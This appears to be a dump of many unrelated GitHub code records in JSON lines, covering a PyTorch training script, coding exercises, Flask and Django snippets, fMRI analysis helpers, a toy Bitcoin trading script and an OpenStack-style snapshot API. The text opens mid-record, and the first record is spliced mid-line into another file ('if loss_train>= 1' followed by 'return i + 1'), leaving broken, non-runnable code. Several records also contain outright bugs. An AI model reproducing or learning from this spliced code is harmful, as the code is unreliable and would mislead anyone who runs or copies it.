OrderedDict\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport time\nimport torch\nfrom torch import nn\nfrom torch import optim\nimport torch.nn.functional as F\nfrom torchvision import datasets, transforms\nfrom torch.optim.lr_scheduler import StepLR\n\n\n\nif __name__ == '__main__':\n\n    dataset = data_handler.data_handler('./data/bikes.csv')\n    samples_train = int(len(dataset) * 0.8)\n    train_set, val_set = torch.utils.data.random_split(dataset, [samples_train, len(dataset) - samples_train])\n\n    dataloader_train = DataLoader(dataset=train_set, batch_size=15, drop_last=True, shuffle=True)\n    dataloader_test = DataLoader(dataset=val_set, batch_size=5,drop_last=True, shuffle=True)\n\n    model = models.MLP_1_hidden(dataset.features, 16, 1)\n\n    epochs = 0\n    criterion = nn.L1Loss()\n    optimizer = optim.Adam(model.parameters(), lr=0.5)\n    scheduler = StepLR(optimizer, step_size=100, gamma=0.1)\n    
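    # StepLR multiplies the optimizer's learning rate by `gamma` every `step_size`
    # calls to scheduler.step() (one call per epoch below), so the initial lr of
    # 0.5 becomes 0.05 after 100 epochs, 0.005 after 200 epochs, and so on.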
loss_anterior = 0\n best_loss = float(np.inf)\n\n while True:\n loss_train=0\n for x_train,y_train in iter(dataloader_train):\n x_train,y_train = x_train.float() ,y_train.float()\n model.train()\n optimizer.zero_grad()\n output = model.forward(x_train)\n loss = criterion(output, y_train)\n loss.backward()\n optimizer.step()\n loss_train += loss.item()\n model.eval()\n with torch.no_grad():\n loss_test = 0\n for x_test, y_test in iter(dataloader_test):\n x_test, y_test = x_test.float(), y_test.float()\n test_output = model.forward(x_test)\n loss_test += criterion(test_output, y_test).item()\n print(f'epoch {epochs + 1} and LR {scheduler.get_last_lr()} done: loss of {loss_train} and loss_test of {loss_test}')\n scheduler.step()\n epochs += 1\n\n\n if loss_train == loss_anterior:\n break\n else:\n loss_anterior = loss_train\n\n if loss_train>= 1\n return i + 1\n\n\ndef solve():\n N = int(rl())\n P = list(map(int, rl().split()))\n \n p_to_idx = [0] * (N + 1)\n for i, x in enumerate(P):\n p_to_idx[x] = i + 1\n \n bit = BinaryIndexedTree(N)\n ans = 0\n for pi in range(N, 0, -1):\n idx = p_to_idx[pi]\n left = bit.sum(idx)\n bit.add(idx, 1)\n right = N - pi - left\n l0 = bit.bisect_left(left - 1) if 2 <= left else 0\n l1 = bit.bisect_left(left) if 1 <= left else 0\n r0 = bit.bisect_left(left + 2) if 1 <= right else N + 1\n r1 = bit.bisect_left(left + 3) if 2 <= right else N + 1\n cnt = 0\n if l1 != 0:\n cnt += (l1 - l0) * (r0 - idx)\n if r0 != 0:\n cnt += (r1 - r0) * (idx - l1)\n ans += pi * cnt\n print(ans)\n\n\nif __name__ == '__main__':\n solve()\n","repo_name":"yuly3/atcoder","sub_path":"ABC/ABC140/E.py","file_name":"E.py","file_ext":"py","file_size_in_byte":1560,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"5529371565","text":"# 1. **Anagram Check**: Write a Python function that checks whether two given words are anagrams.\n# - *Input*: \"cinema\", \"iceman\"\n# - *Output*: \"True\"\nword1 = \"cinema\"\nword2 = \"iceman\"\ndef anagrams(word1, word2):\n w1=word1.replace(\" \",\"\").lower()\n w2=word2.replace(\" \",\"\").lower()\n return sorted(w1)==sorted(w2)\n\nprint(anagrams(word1, word2))\n\n# 2. **Bubble Sort**: Implement the bubble sort algorithm in Python.\n# - *Input*: [64, 34, 25, 12, 22, 11, 90]\n# - *Output*: \"[11, 12, 22, 25, 34, 64, 90]\"\narr=[64, 34, 25, 12, 22, 11, 90]\ndef bubblesort(arr):\n n=len(arr)\n for i in range(n):\n for j in range(0,n-i-1):\n if arr[j]>arr[j+1]:\n arr[j],arr[j+1]=arr[j+1],arr[j]\n\n\nbubblesort(arr)\nprint(arr)\n\n# 3. **Longest Common Prefix**: Given a list of strings, find the longest common prefix.\n# - *Input*: [\"flower\",\"flow\",\"flight\"]\n# - *Output*: \"fl\"\n\nword= [\"flower\",\"flow\",\"flight\"]\ndef comprefix(word):\n prefix=\"\"\n if not word:\n return \"\"\n word.sort()\n for i in range(len(word[0])):\n if word[0][i]==word[-1][i]:\n prefix+=word[0][i]\n else:\n break\n return prefix\n\n\nprint(comprefix(word))\n\n# 4. 
**String Permutations**: Write a Python function to calculate all permutations of a given string.\n#    - *Input*: \"abc\"\n#    - *Output*: \"['abc', 'acb', 'bac', 'bca', 'cab', 'cba']\"\n\nfrom itertools import permutations\n\ndef string_permutations(input_string):\n    # Generate all permutations of the input string\n    perms = permutations(input_string)\n    \n    # Convert permutations to a list of strings\n    result = [''.join(permutation) for permutation in perms]\n    \n    return result\n\n# Input string\ninput_string = \"abc\"\n\n# Get permutations and print the output\npermutations_list = string_permutations(input_string)\nprint(permutations_list)  # Output: ['abc', 'acb', 'bac', 'bca', 'cab', 'cba']\n","repo_name":"kkalyankumar9/GenAi_Projects","sub_path":"PythonGENAI/Day1/L2/set4.py","file_name":"set4.py","file_ext":"py","file_size_in_byte":1917,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"24795614160","text":"# A return statement marks the end of a function\ndef test(a, b):\n    x = a // b\n    y = a % b\n    return x, y\n    # return [x,y]\n    # return {'x':x,'y':y}\n\n\n# Normally, a function executes at most one return statement\n# In special cases (a finally clause), a function may execute more than one return statement\n\nresult = test(13, 5)\nprint('The quotient is {}, the remainder is {}'.format(result[0], result[1]))\n# print('The quotient is {}, the remainder is {}'.format(result['x'], result['y']))\n\n# The returned values can also be unpacked\nshang, yushu = test(16, 3)\nprint('The quotient is {}, the remainder is {}'.format(shang, yushu))\n","repo_name":"weizt/python_studying","sub_path":"函数/07-函数的多个返回值.py","file_name":"07-函数的多个返回值.py","file_ext":"py","file_size_in_byte":569,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"17326293788","text":"import json\n\nfrom flask import Flask, render_template\napp = Flask(__name__)\n\n''' \nParticipate in a data pipeline here '''\n@app.route(\"/get\")\ndef get():\n    try:\n        response_data = {\n            \"message\": \"Hello world from Cratus!\"}\n        return app.response_class(\n            response=json.dumps(response_data),\n            status=200,\n            mimetype='application/json')\n    except Exception as e:\n        print(e)\n\n''' \nServe Interactive container frontends and Analytics Dashboards here.'''\n@app.route('/')\ndef root():\n    return render_template('index.html')\n\nif __name__ == \"__main__\":\n    app.run(debug=False, host='0.0.0.0', port=8080)\n","repo_name":"cratus-tech-tutorials/Asset-Rx-Edge-Container-Tutorial","sub_path":"head-node-tutorial/app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":657,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"26690891324","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n    path('allmanga', views.show_allmanga),\n    # path('mangafilter', views.MangaFilterView),\n    path('singlemanga/', views.singlemanga, name='singlecomic'),\n    path('search', views.search_titles),\n    path('likes', views.like_comic)\n]\n\n","repo_name":"pSaurav10/MangaGeek","sub_path":"Assignment/comic/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":309,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"44016506214","text":"\"\"\"\nYou are keeping the scores for a baseball game with strange rules. 
At the beginning of the game, you start with an empty record.\n\nYou are given a list of strings operations, where operations[i] is the ith operation you must apply to the record and is one of the following:\n\nAn integer x.\nRecord a new score of x.\n'+'.\nRecord a new score that is the sum of the previous two scores.\n'D'.\nRecord a new score that is the double of the previous score.\n'C'.\nInvalidate the previous score, removing it from the record.\nReturn the sum of all the scores on the record after applying all the operations.\n\nThe test cases are generated such that the answer and all intermediate calculations fit in a 32-bit integer and that all operations are valid.\n\"\"\"\n\ndef calPoints(operations):\n# intialize a stack to house the score values\n score_stack = []\n # initialize a variable to track the total sum in the stack\n total = 0\n # iterate through the list\n for operation in operations:\n if operation == \"+\":\n # if the char is \"+\" add the previous two from the score stack, push the sum to the top of the score stack\n last_el = score_stack[-1]\n second_last_el = score_stack[-2]\n score_stack.append(last_el + second_last_el)\n total += (last_el + second_last_el)\n elif operation == \"D\":\n # if the char is \"D\" get the most recent value added to the score stack, double it and push it to the top of the stack\n last_el = score_stack[-1]\n score_stack.append(last_el * 2)\n total += (last_el * 2)\n elif operation == \"C\":\n # if the char is \"C\" remove the previous score added to the score stack\n last_el = score_stack.pop()\n total -= last_el\n else:\n # everything else we can assume is an int and push the value as an integer to the score stack\n score_stack.append(int(operation))\n total += int(operation)\n\n # return the total sum of the stack\n return total\n\nprint(calPoints([\"5\",\"2\",\"C\",\"D\",\"+\"])) # 30\nprint(calPoints([\"5\",\"-2\",\"4\",\"C\",\"D\",\"9\",\"+\",\"+\"])) # 27\nprint(calPoints([\"1\",\"C\"])) # 0\n","repo_name":"NickArakaki/ds-a-practice","sub_path":"LeetCode/Completed/Arrays/682.BaseballGame.py","file_name":"682.BaseballGame.py","file_ext":"py","file_size_in_byte":2163,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"13913668474","text":"def register(username, license_plate_number, registered_users):\n if username in registered_users.keys() and registered_users[username] is not None:\n print(f\"ERROR: already registered with plate number {registered_users[username]}\")\n else:\n registered_users[username] = license_plate_number\n print(f\"{username} registered {license_plate_number} successfully\")\n\n return registered_users\n\n\ndef unregister(username, registered_users):\n if username not in registered_users:\n print(f\"ERROR: user {username} not found\")\n else:\n registered_users.pop(username)\n print(f\"{username} unregistered successfully\")\n\n return registered_users\n\n\nnumber_of_commands = int(input())\n\nparking_users = {}\n\nfor _ in range(number_of_commands):\n command = input().split()\n\n if command[0] == 'unregister':\n operation = command[0]\n name = command[1]\n else:\n operation = command[0]\n name = command[1]\n plate_number = command[2]\n\n if operation == 'register':\n parking_users = register(name, plate_number, parking_users)\n else:\n parking_users = unregister(name, parking_users)\n\n\nfor name, license_plate in parking_users.items():\n print(f\"{name} => 
{license_plate}\")","repo_name":"dmtr26666/python_softuni","sub_path":"programming_fundamentals_2023/07 - dictionaries/exercises/softuni_parking.py","file_name":"softuni_parking.py","file_ext":"py","file_size_in_byte":1261,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"6555178708","text":"#!/usr/bin/python3\n''' Module:\n add two integers\n'''\n\n\ndef add_integer(a, b=98):\n '''Return the sum of two integers\n '''\n if type(a) is not int and type(a) is not float:\n raise TypeError(\"a must be an integer\")\n if type(b) is not int and type(b) is not float:\n raise TypeError(\"b must be an integer\")\n a = int(a)\n b = int(b)\n return a + b\n","repo_name":"AhlemKaabi/holbertonschool-higher_level_programming","sub_path":"0x07-python-test_driven_development/0-add_integer.py","file_name":"0-add_integer.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"21036702247","text":"import json\nimport requests\nimport urllib\nimport re\n\nT = 50\n\n\ndef findBuy(L):\n \"\"\"this function finds the minumum point, which tells us\n we should buy\"\"\"\n # L: list of 30 elements\n return L.index(min(L))\n\n\ndef findSell(L):\n \"\"\" finds the maximum point, where we should sell\"\"\"\n return L.index(max(L))\n\n\ndef buyBitcoin(x):\n x = float(x)\n x = str(x)\n data = 'BUY ' + x + ' BTC jmf784hkuhkufsd'\n info = requests.post('http://lauzhack.sqpub.ch', data=data)\n print(data)\n\n\n\ndef sellBitcoin(x):\n x = float(x)\n x = str(x)\n data = 'SELL ' + x + ' BTC jmf784hkuhkufsd'\n info = requests.post('http://lauzhack.sqpub.ch', data=data)\n print(data)\n\n\ndef streamData():\n r = requests.get(\"http://lauzhack.sqpub.ch/prices\", stream=True)\n\n for chunk in r.iter_content(chunk_size=1024):\n t = 0\n chunk = str(chunk)\n for x in chunk:\n if x <= ' ':\n break\n t = t + 1\n i = t + 1\n for i in range(len(chunk)):\n if chunk[i] > '9' or chunk[i] < '0' or chunk[i] != '.':\n break\n i = i + 1\n val = float(chunk[t + 1:i])\n print(val)\n\n\ndef popLowest(L_L,A):\n i = A.index(min(A))\n print(i)\n L_L.pop(2*i)\n L_L.pop(2*i)\n A.pop(i)\n A.append(0)\n\ndef choose(L, L_L):\n var = float(\"inf\")\n closest = 0\n i=0\n for i in range(int(len(L_L)/2)):\n s = 0\n for k in range(T):\n s += abs(L[k] - L_L[2*i][k])\n if (s < var):\n closest = i\n var = s\n return 2*i + 1\n\n\ndef calculate_Q():\n url = urllib.request.urlopen(\"http://lauzhack.sqpub.ch/teams\")\n data = json.loads(url.read().decode())\n return data[4][\"XBT\"], data[4][\"cash\"]\n\n\n","repo_name":"Bastian2008/LauzHack","sub_path":"Functions.py","file_name":"Functions.py","file_ext":"py","file_size_in_byte":1749,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"6923614620","text":"import torch\nimport joblib\nimport numpy as np\nfrom tqdm import tqdm\nimport matplotlib.pyplot as plt\nfrom scipy.stats import pearsonr\nfrom utils.final_model import ResNet1HeadID\nfrom torchvision.models.feature_extraction import create_feature_extractor\nfrom utils.evaluation import MNNPC\nimport torchvision.transforms as T\nimport os\n\ndef load_images_from_folder(folder_path, start=None, end=None):\n image_paths = []\n for filename in os.listdir(folder_path)[start:end]:\n img_path = os.path.join(folder_path, filename)\n\n image_paths.append(img_path)\n return image_paths\n\n#slightly adjusted load_subject_data func\ndef 
load_subject_data(subject, index_start=None, index_end=None):\n current_proj_dir = os.getcwd().split('hpc')[0] + 'hpc'\n path = '/Users/emilykruger/Documents/GitHub/aml_project_2023/data/training_split/subj0' + str(subject)\n data_lh = np.load(path + '/training_fmri/lh_train_fmri.npy')[index_start : index_end]\n data_rh = np.load(path + '/training_fmri/rh_train_fmri.npy')[index_start : index_end]\n brain = np.concatenate((data_lh, data_rh), axis = 1)\n print('Shape of pca_brain: ', brain.shape)\n folder_path = path+\"/training_images/\"\n image_paths = load_images_from_folder(folder_path, index_start, index_end)\n \n return brain, image_paths\n\n#For ResNet \ndef get_block_names(model):\n layer_names = []\n for layer_name, _ in model.named_children():\n layer_names.append(layer_name)\n return layer_names\n\n#For Aleknet\ndef get_module_names(model):\n layer_names = []\n for layer_name, _ in model.named_modules():\n layer_names.append(layer_name)\n return layer_names\n\ndef flatten_features(outputs):\n for key, item in outputs.items():\n outputs[key] = item.flatten()\n return outputs\n\ndef make_prediction(model, flattened_dict, in_feat_model):\n preds = {}\n for key, item in flattened_dict.items():\n adj_layer = torch.nn.Linear(len(item), in_feat_model)\n adj_layer.requires_grad = False\n adj_output = adj_layer(item)\n pred = model.head(adj_output)\n preds[key] = pred\n return preds\n\n# def make_prediction(model, flattened_dict, in_feat_model, subject):\n# preds = {}\n# for key, item in flattened_dict.items():\n# adj_layer = torch.nn.Linear(len(item), in_feat_model)\n# print('3. in_size of adj_layer', len(item))\n# print('4. out_size of adj_layer', in_feat_model)\n# print('5. in_size of shared layer', model.shared.in_features)\n# adj_layer.requires_grad = False\n# adj_output = adj_layer(item)\n# shared = model.shared(adj_output)\n# if subject == 1:\n# subject = model.sub1(adj_output)\n# elif subject == 2:\n# subject = model.sub2(adj_output)\n# elif subject == 3:\n# subject = model.sub3(adj_output)\n# elif subject == 4:\n# subject = model.sub4(adj_output)\n# elif subject == 5:\n# subject = model.sub5(adj_output)\n# elif subject == 6:\n# subject = model.sub6(adj_output)\n# elif subject == 7:\n# subject = model.sub7(adj_output)\n# elif subject == 8:\n# subject = model.sub8(adj_output)\n\n# # Average the shared and subject-specific layers\n# combined = (shared + subject) / 2\n \n# pred = model.head(combined)\n# preds[key] = pred\n# return preds\n\ndef get_pca_model(subject):\n sub = str(subject)\n pca = joblib.load(f'/Users/emilykruger/Documents/GitHub/aml_project_2023/hpc/utils/pca_models/pca_model_subj01.joblib')\n return pca\n\ndef preprocess(img, size=224):\n transform = T.Compose([\n T.ToTensor(),\n T.Resize((size, size)),\n T.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]),\n\n ])\n return transform(img)\n\ndef process_subject_data(data,subject, split=True):\n subject = f'subj0{subject}'\n # Define the split dictionary\n split_dict = {\"subj01\": 19004, \"subj02\": 19004, \"subj03\": 19004, \"subj04\": 19004,\n \"subj05\": 19004, \"subj06\": 18978, \"subj07\": 19004, \"subj08\": 18981}\n\n\n if subject not in split_dict.keys():\n print(\"Invalid subject\")\n return None, None\n\n # Split data based on the split dictionary\n if split:\n lh_data = data[:split_dict[subject]]\n rh_data = data[split_dict[subject]:]\n else:\n lh_data = data\n rh_data = None\n\n # Read ROI directories\n roi_dir_lh = 
np.load(f'/Users/emilykruger/Documents/GitHub/aml_project_2023/data/training_split/{subject}/roi_masks/lh.all-vertices_fsaverage_space.npy')\n    if rh_data is not None:\n        roi_dir_rh = np.load(f'/Users/emilykruger/Documents/GitHub/aml_project_2023/data/training_split/{subject}/roi_masks/rh.all-vertices_fsaverage_space.npy')\n    else:\n        roi_dir_rh = None\n\n    # Create responses\n    fsaverage_response_lh = np.zeros(len(roi_dir_lh))\n    fsaverage_response_lh[np.where(roi_dir_lh)[0]] = lh_data\n\n    if rh_data is not None:\n        fsaverage_response_rh = np.zeros(len(roi_dir_rh))\n        fsaverage_response_rh[np.where(roi_dir_rh)[0]] = rh_data\n    else:\n        fsaverage_response_rh = None\n\n    return fsaverage_response_lh, fsaverage_response_rh\n\ndef corr_roi_plot(model, lh, rh, dataset, subject, split = True):\n    subject = f'subj0{subject}'\n    working_dir = rf'C:\\Users\\rvacher\\Downloads\\algonauts_2023_tutorial_data\\{subject}' #Change as needed\n    transform = T.Compose([\n        T.ToTensor(), T.Resize((224, 224)),\n        T.Normalize(mean=[0.485, 0.456, 0.406], \n                    std=[0.229, 0.224, 0.225])])\n\n    #logic for setting up the val dataset and remember to transform the dataset with the transform initialized above\n    dataset = dataset #this is hopefully a val or test dataset or else you're banned >:(\n    ## ADD\n    ## CODE\n    ## HERE\n    dataloader = [] # make this into the dataloader\n\n    full_brain_pred = model(dataloader)\n\n    # Define the split dictionary\n    split_dict = {\"subj01\": 19004, \"subj02\": 19004, \"subj03\": 19004, \"subj04\": 19004,\n                \"subj05\": 19004, \"subj06\": 18978, \"subj07\": 19004, \"subj08\": 18981}\n\n\n    if subject not in split_dict.keys():\n        print(\"Invalid subject\")\n        return None, None\n\n    # Split data based on the split dictionary\n    if split:\n        lh_data_pred = full_brain_pred[:split_dict[subject]]\n        rh_data_pred = full_brain_pred[split_dict[subject]:]\n    else:\n        lh_data_pred = full_brain_pred\n        rh_data_pred = None\n\n    # Empty correlated array\n    lh_correlation = np.zeros(lh.shape[1])\n    rh_correlation = np.zeros(rh.shape[1])\n\n    # Correlate each predicted LH vertex with the corresponding ground truth vertex\n    for v in tqdm(range(lh.shape[1])):\n        lh_correlation[v] = pearsonr(lh_data_pred[:,v], lh[:,v])[0]\n\n    # Correlate each predicted RH vertex with the corresponding ground truth vertex\n    for v in tqdm(range(rh.shape[1])):\n        rh_correlation[v] = pearsonr(rh_data_pred[:,v], rh[:,v])[0]\n\n    # Load the ROI classes mapping dictionaries\n    roi_mapping_files = ['mapping_prf-visualrois.npy', 'mapping_floc-bodies.npy',\n        'mapping_floc-faces.npy', 'mapping_floc-places.npy',\n        'mapping_floc-words.npy', 'mapping_streams.npy']\n    roi_name_maps = []\n    for r in roi_mapping_files:\n        roi_name_maps.append(np.load(os.path.join(working_dir, 'roi_masks', r),\n                allow_pickle=True).item())\n\n    # Load the ROI brain surface maps\n    lh_challenge_roi_files = ['lh.prf-visualrois_challenge_space.npy',\n        'lh.floc-bodies_challenge_space.npy', 'lh.floc-faces_challenge_space.npy',\n        'lh.floc-places_challenge_space.npy', 'lh.floc-words_challenge_space.npy',\n        'lh.streams_challenge_space.npy']\n    rh_challenge_roi_files = ['rh.prf-visualrois_challenge_space.npy',\n        'rh.floc-bodies_challenge_space.npy', 'rh.floc-faces_challenge_space.npy',\n        'rh.floc-places_challenge_space.npy', 'rh.floc-words_challenge_space.npy',\n        'rh.streams_challenge_space.npy']\n    lh_challenge_rois = []\n    rh_challenge_rois = []\n    for r in range(len(lh_challenge_roi_files)):\n        lh_challenge_rois.append(np.load(os.path.join(working_dir, 'roi_masks',\n                            lh_challenge_roi_files[r])))\n        
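        # Each *_challenge_space.npy array holds one integer ROI label per vertex;
        # label 0 marks vertices outside every ROI (see the r2[0] != 0 check below).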
rh_challenge_rois.append(np.load(os.path.join(working_dir, 'roi_masks',\n                            rh_challenge_roi_files[r])))\n\n    # Select the correlation results vertices of each ROI\n    roi_names = []\n    lh_roi_correlation = []\n    rh_roi_correlation = []\n    for r1 in range(len(lh_challenge_rois)):\n        for r2 in roi_name_maps[r1].items():\n            if r2[0] != 0: # zeros indicate vertices falling outside the ROI of interest\n                roi_names.append(r2[1])\n                lh_roi_idx = np.where(lh_challenge_rois[r1] == r2[0])[0]\n                rh_roi_idx = np.where(rh_challenge_rois[r1] == r2[0])[0]\n                lh_roi_correlation.append(lh_correlation[lh_roi_idx])\n                rh_roi_correlation.append(rh_correlation[rh_roi_idx])\n    roi_names.append('All vertices')\n    lh_roi_correlation.append(lh_correlation)\n    rh_roi_correlation.append(rh_correlation)\n\n    # Create the plot\n    lh_mean_roi_correlation = [np.mean(lh_roi_correlation[r])\n        for r in range(len(lh_roi_correlation))]\n    rh_mean_roi_correlation = [np.mean(rh_roi_correlation[r])\n        for r in range(len(rh_roi_correlation))]\n    plt.figure(figsize=(18,6))\n    x = np.arange(len(roi_names))\n    width = 0.30\n    plt.bar(x - width/2, lh_mean_roi_correlation, width, label='Left Hemisphere')\n    plt.bar(x + width/2, rh_mean_roi_correlation, width,\n        label='Right Hemisphere')\n    plt.xlim(left=min(x)-.5, right=max(x)+.5)\n    plt.ylim(bottom=0, top=1)\n    plt.xlabel('ROIs')\n    plt.xticks(ticks=x, labels=roi_names, rotation=60)\n    plt.ylabel('Mean Pearson\\'s $r$')\n    plt.title(f'Encoding Accuracy of Individual ROIs for {subject}')\n    plt.legend(frameon=True, loc=1)\n    plt.show()\n    ","repo_name":"RaghavVacher/aml_project_2023","sub_path":"hpc/utils/model_analysis.py","file_name":"model_analysis.py","file_ext":"py","file_size_in_byte":10011,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"19161008286","text":"\nf = open(\"input.txt\", \"rt\")\ndata=f.read()\nf.close()\nprint(data)\n\nfor line in data: #prints individual letters line by line\n    print(line)\n    \nf = open(\"input.txt\",\"rt\")\nfor a in f:\n    print(a)\nf.close()\n\nf = open(\"output.txt\",\"wt\")\nf.write(data)\nf.close()\n\nf = open(\"output.txt\",\"wt\")\nprint(data,file = f)\nf.close()\n","repo_name":"KUP9752/PekgozKU-Yr12-Computer-Science","sub_path":"Work/PYTHON CODE/file IO/file IO.py","file_name":"file IO.py","file_ext":"py","file_size_in_byte":320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"37626766217","text":"import reflex as rx\nfrom portfolio_web.styles.colors import colors as c\ncolor_principal = 'spectra'\n\n\ndef footer():\n    r = rx.link(rx.center(rx.heading('Download CV',\n                                    size='lg',\n                                    transition='font-size 0.3s',\n                                    _hover={'font-size': '2.2em'}),\n                        ),\n                href='/CV_IT_1.pdf',\n                width='100%',\n                # height='100%',\n                opacity='0.5',\n                bg=c[color_principal]['900'],\n                is_external=True,\n                transition='opacity 0.3s',\n                _hover={'opacity': 1,\n                        'background-color': c[color_principal]['200']\n                        }\n                )\n\n    return r\n\n\ndef tags_grid(tags):\n    tag_components = []\n    for tag in tags:\n        tag_components.append(\n            rx.tag(tag,\n                bg=c[color_principal]['800'],\n                color=c[color_principal]['200']),\n            )\n    topics = rx.flex(\n        *tag_components,\n        margin_top='1rem',\n        wrap='wrap',\n        gap='2',\n    )\n    return topics\n\n\ndef card_footer(hard,soft):\n    return rx.vstack(\n        rx.text('Hard Skills Used',\n                as_='b'),\n        tags_grid(hard),\n        rx.text('Soft Skills Used',\n                as_='b'),\n        tags_grid(soft),\n        align_items='left',\n        margin=0,\n        padding=0\n    
)","repo_name":"juampa95/portfolio-web","sub_path":"portfolio_web/views/experience/footer.py","file_name":"footer.py","file_ext":"py","file_size_in_byte":1479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"31861606714","text":"\nimport pandas as pd\nfrom datetime import datetime\n\ndf = pd.read_csv(\"sphist.csv\")\ndf[\"Date\"] = pd.to_datetime(df[\"Date\"])\ndf = df[df[\"Date\"] > datetime(year=2015,month=4,day=1)]\ndf.sort(\"Date\",inplace = True,ascending=False)\nstarting_row = df[\"Date\"] == '1951-01-03'\nfor row in df[starting_row:]:\n print(row)\n break\n \n \n \n ","repo_name":"Nfinger/Nfinger.github.io","sub_path":"predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":342,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"9392025873","text":"from webob import exc\n\nfrom nova import log as logging\nfrom nova.api.openstack import wsgi\nfrom nova.notifier import api as notifier\nfrom nova import utils\nfrom nova import flags\n\nfrom reddwarf import exception\nfrom reddwarf.api import common\nfrom reddwarf.api import deserializer\nfrom reddwarf.api.views import snapshots\nfrom reddwarf.guest import api as guest_api\nfrom reddwarf.db import api as dbapi\nfrom reddwarf.db import snapshot_state\nfrom reddwarf.client import credential\nfrom swiftapi import swift\nimport urlparse\n\nLOG = logging.getLogger('reddwarf.api.snapshots')\nLOG.setLevel(logging.DEBUG)\n\nFLAGS = flags.FLAGS\n\ndef publisher_id(host=None):\n return notifier.publisher_id(\"reddwarf-api\", host)\n\nclass Controller(object):\n def __init__(self):\n self.guestapi = guest_api.API()\n self.view = snapshots.ViewBuilder()\n super(Controller, self).__init__()\n\n def show(self, req, id):\n \"\"\" Returns a requested snapshot \"\"\"\n LOG.info(\"Get snapshot %s\" % id)\n LOG.debug(\"%s - %s\", req.environ, req.body)\n db_snapshot = dbapi.db_snapshot_get(id)\n if not db_snapshot:\n return exc.HTTPNotFound()\n\n snapshot = self.view.build_single(db_snapshot, req)\n return { 'snapshot' : snapshot }\n\n def index(self, req):\n \"\"\" Returns a list of Snapshots for the Instance \"\"\"\n LOG.info(\"List snapshots\")\n LOG.debug(\"%s - %s\", req.environ, req.body)\n context = req.environ['nova.context']\n user_id = context.user_id\n\n instance_id = ''\n if req.query_string is not '':\n # returns list of tuples\n name_value_pairs = urlparse.parse_qsl(req.query_string,\n keep_blank_values=True,\n strict_parsing=False)\n for name_value in name_value_pairs:\n if name_value[0] == 'instanceId':\n instance_id = name_value[1]\n break\n\n if instance_id and len(instance_id) > 0:\n LOG.debug(\"Listing snapshots by instance_id %s\", instance_id)\n snapshot_list = dbapi.db_snapshot_list_by_user_and_instance(context, user_id, instance_id)\n else:\n LOG.debug(\"Listing snapshots by user_id %s\", user_id)\n snapshot_list = dbapi.db_snapshot_list_by_user(context, user_id)\n\n snapshots = [self.view.build_index(db_snapshot, req)\n for db_snapshot in snapshot_list]\n\n return dict(snapshots=snapshots)\n\n def delete(self, req, id):\n \"\"\" Deletes a Snapshot \"\"\"\n LOG.info(\"Delete snapshot with id %s\", id)\n LOG.debug(\"%s - %s\", req.environ, req.body)\n context = req.environ['nova.context']\n db_snapshot = dbapi.db_snapshot_get(id)\n\n if not db_snapshot:\n return exc.HTTPNotFound()\n\n uri = db_snapshot.storage_uri\n\n #Only delete from swift if we have a URI\n if uri and len(uri) > 0:\n container, 
file = uri.split('/', 1)  # maxsplit=1: everything after the first '/' is the object name\n\n            LOG.debug(\"Deleting from Container: %s - File: %s\", container, file)\n\n            ## TODO Move these to database!\n            ST_AUTH=FLAGS.swiftclient_auth_url\n            ST_USER=FLAGS.swiftclient_user\n            ST_KEY=FLAGS.swiftclient_key\n\n            opts = {'auth' : ST_AUTH,\n                    'user' : ST_USER,\n                    'key' : ST_KEY,\n                    'snet' : False,\n                    'prefix' : '',\n                    'auth_version' : '1.0'}\n            try:\n                swift.st_delete(opts, container, file)\n            except Exception as e:\n                return exc.HTTPInternalServerError(e)\n\n        # Mark snapshot deleted in DB\n        dbapi.db_snapshot_delete(context, id)\n\n        return exc.HTTPNoContent()\n\n    def create(self, req, body):\n        \"\"\" Creates a Snapshot \"\"\"\n        self._validate(body)\n        instance_id = body['snapshot']['instanceId']\n        name = body['snapshot']['name']\n        LOG.info(\"Create Snapshot for instance %s\", instance_id)\n        LOG.debug(\"%s - %s\", req.environ, req.body)\n\n        context = req.environ['nova.context']\n\n        # Generate UUID for Snapshot\n        uuid = str(utils.gen_uuid())\n\n        values = {\n            'uuid' : uuid,\n            'instance_uuid' : instance_id,\n            'name' : name,\n            'state' : snapshot_state.SnapshotState.INPROGRESS,\n            'user_id' : context.user_id,\n            'project_id' : context.project_id\n            }\n\n        ## TODO Move these to database!\n        ST_AUTH=FLAGS.swiftclient_auth_url\n        ST_USER=FLAGS.swiftclient_user\n        ST_KEY=FLAGS.swiftclient_key\n\n        # Add record to database\n        db_snapshot = dbapi.db_snapshot_create(context, values)\n        cred = credential.SwiftCredential(ST_USER, ST_KEY, ST_AUTH)\n        self.guestapi.create_snapshot(context, instance_id, uuid, cred)\n        snapshot = self.view.build_single(db_snapshot, req)\n        return { 'snapshot' : snapshot }\n\n    def _validate(self, body):\n        \"\"\"Validate that the request has all the required parameters\"\"\"\n        if not body:\n            raise exception.BadRequest(\"The request contains an empty body\")\n        try:\n            body['snapshot']\n            body['snapshot']['instanceId']\n            body['snapshot']['name']\n        except KeyError as e:\n       